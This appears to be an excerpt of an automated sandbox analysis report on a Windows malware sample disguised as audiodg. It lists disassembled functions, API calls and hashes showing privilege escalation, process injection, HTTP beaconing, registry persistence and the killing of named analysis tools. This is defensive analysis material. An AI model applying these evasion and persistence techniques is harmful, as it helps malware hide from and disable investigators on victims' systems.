                                                                                                                                                                                                                          • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction ID: dc5f13bdc9212b6b0fe7a79189c8ef7b10761548cafd4398b57341666d079bdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0332E732609AC186E772DF15F8547AAA3B2FB98B80F414535DA8E83B68DF3CD454CB10
                                                                                                                                                                                                                          Function 00007FF7A91B40E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                          • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction ID: 87a06f4f470b3f46ef5ab7b575e95d6d78648ed0744eb19a22ee51115dd25a02
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B416D3261DA8186E351EF55F44832EF7B1FB84754F918034EA8A86AA8CF7DD458CF10
                                                                                                                                                                                                                          Function 00007FF7A91B2CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                          • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction ID: ba24ea550f3a24acaccd85e293da3e45907fdd6a8fcc5c396d5574c61a4708af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2410032609A8586E7719F15F44436BB7B1F794B88F504429EA8C83B68CF7DD4588B40
                                                                                                                                                                                                                          Function 00007FF7A91B1CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7A91B1D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                          • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction ID: e219a3160157b1090b1d65c3f7cc9d5a7552111c0384420d9c980f8dc31385ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7071F532619A8182E761AF50F49832AF7B1FBC4794F911035FA8E83A68CF7CD4548B20
                                                                                                                                                                                                                          Function 00007FF7A91B46E4 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2693768547-0
                                                                                                                                                                                                                          • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction ID: 9785da413cab7a7eab783ed41d9a581bd7575bd7e9e164ebfcb03b44d52b1283
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43810932609B8182EA51DF59F48436AE7B1FBC8B90F514135EA8D83B78DF3CD4548B10
                                                                                                                                                                                                                          Function 00007FF7A91B30DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B460C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B4649
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B4654
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B311C), ref: 00007FF7A91B3BC7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3B84: RegSetValueExW.ADVAPI32 ref: 00007FF7A91B3BFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3B84: RegCloseKey.ADVAPI32 ref: 00007FF7A91B3C0C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7A91B3C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7A91B3E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: Process32FirstW.KERNEL32 ref: 00007FF7A91B3E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: wcscmp.MSVCRT ref: 00007FF7A91B3E91
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: OpenProcess.KERNEL32 ref: 00007FF7A91B3EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: TerminateProcess.KERNEL32 ref: 00007FF7A91B3ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: Process32NextW.KERNEL32 ref: 00007FF7A91B3EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3EFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7A91B3B0C), ref: 00007FF7A91B39E4
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF7A91B31C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 2853470409-928700279
                                                                                                                                                                                                                          • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction ID: 97efc93cd10e2b7a864ad5ded3685053dadfc50649636a99c597bbae0abb289c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9218820A5B94294EA07FF20FD511B8E2B2EF60750FC20532E41DC25F6DE2CE93A8630
                                                                                                                                                                                                                          Function 00007FF7A91B38C4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7A91B3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7A91B3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: wsprintfW.USER32 ref: 00007FF7A91B38A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                          • Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                                          • Instruction ID: 657b805cf4ec8e02042701622303c4db152eca361d1cc5c1e8b8023c7fb0cb2d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6111212172998685DB61BF25F85476AA3B2FBC4B80F815031DA8E87E39DE3CD525C710
                                                                                                                                                                                                                          Function 00007FF7A91B2E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185
                                                                                                                                                                                                                          • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction ID: 51415abe456518a1eeefa84989e04dc74184da2e6d17019409f7cc799084f17d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD01C026A0DA4181E732BF11F854269A7B2FBDCB95F850531D94EC2A74CF3CD6A58620
                                                                                                                                                                                                                          Function 00007FF7A91B3E24 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction ID: 45675ad007755a6469378cd6d83b9ac62ebe8277d5d69cda1e527e70176aa337
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B210031A0EA8681E771AF15F84836AE3B2FBC4754F814235C55E829B8DF3DD565CB20
                                                                                                                                                                                                                          Function 00007FF7A91B2F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction ID: cee3c6548fd6d34fbdbbe4bcdebb1c7db9955d7f273c30265c8c6f1c604be7c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C401D226A1DA4182E722AF11F85426DA3B2FBD8B45F810535E98ED2A74CF2CD5548610
                                                                                                                                                                                                                          Function 00007FF7A91B3CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction ID: 572ead1a65346d53afa6e67683c8d9e8ef9a9395994fffade03c501020f828b3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED31C77261EAC485DB71AF19F4987AAA3B1F788740F810125DA8DC3B68DF3CD165CB10
                                                                                                                                                                                                                          Function 00007FF7A91B3A74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7A91B3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7A91B3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B3744: wsprintfW.USER32 ref: 00007FF7A91B38A2
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00007FF7A91B3AB9
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32 ref: 00007FF7A91B3AC4
                                                                                                                                                                                                                          • CopyFileW.KERNEL32 ref: 00007FF7A91B3ADD
